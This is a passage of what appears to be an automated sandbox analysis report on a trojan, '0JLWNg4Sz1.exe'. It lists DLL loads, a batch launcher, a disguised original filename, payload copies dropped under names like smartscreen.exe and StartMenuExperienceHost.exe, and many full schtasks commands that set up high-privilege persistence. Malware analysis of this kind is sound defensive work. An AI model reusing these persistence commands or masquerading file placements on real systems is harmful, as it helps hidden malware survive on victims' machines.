Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B770D47 30_2_00007FFD9B770D47
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B770E43 30_2_00007FFD9B770E43
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 30_2_00007FFD9B7A1998 30_2_00007FFD9B7A1998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B7A1998 31_2_00007FFD9B7A1998
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B770D47 31_2_00007FFD9B770D47
Source: C:\Recovery\StartMenuExperienceHost.exe Code function: 31_2_00007FFD9B770E43 31_2_00007FFD9B770E43
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\ALzNWdSZ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Sample file is different than original file name gathered from version info
Source: 0JLWNg4Sz1.exe, 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1713723661.000000001C6B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.0000000002613000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 00000019.00000002.1830063676.00000000025C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000035AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.00000000034E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe, 0000001A.00000002.1836994543.0000000003533000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Source: 0JLWNg4Sz1.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0JLWNg4Sz1.exe
Uses 32bit PE files
Source: 0JLWNg4Sz1.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 0JLWNg4Sz1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DViaOgnvmAhwCXZ.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DViaOgnvmAhwCXZ.exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: smartscreen.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: StartMenuExperienceHost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.evad.winEXE@36/25@1/1
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Program Files (x86)\microsoft\Edge\smartscreen.exe Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\Desktop\ALzNWdSZ.log Jump to behavior
Source: C:\Recovery\StartMenuExperienceHost.exe Mutant created: NULL
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-sKFQIzXKnAf7PnSalSzG
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File created: C:\Users\user\AppData\Local\Temp\aC4Ftn18Tq Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
Source: 0JLWNg4Sz1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0JLWNg4Sz1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0JLWNg4Sz1.exe ReversingLabs: Detection: 65%
Source: 0JLWNg4Sz1.exe Virustotal: Detection: 56%
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File read: C:\Users\user\Desktop\0JLWNg4Sz1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
Source: unknown Process created: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz1" /sc ONLOGON /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 14 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown Process created: C:\Users\user\Desktop\0JLWNg4Sz1.exe C:\Users\user\Desktop\0JLWNg4Sz1.exe
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
Source: unknown Process created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
Source: unknown Process created: C:\Recovery\StartMenuExperienceHost.exe C:\Recovery\StartMenuExperienceHost.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rasman.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winmm.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: devobj.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: ksuser.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: avrt.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: audioses.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Section loaded: midimap.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
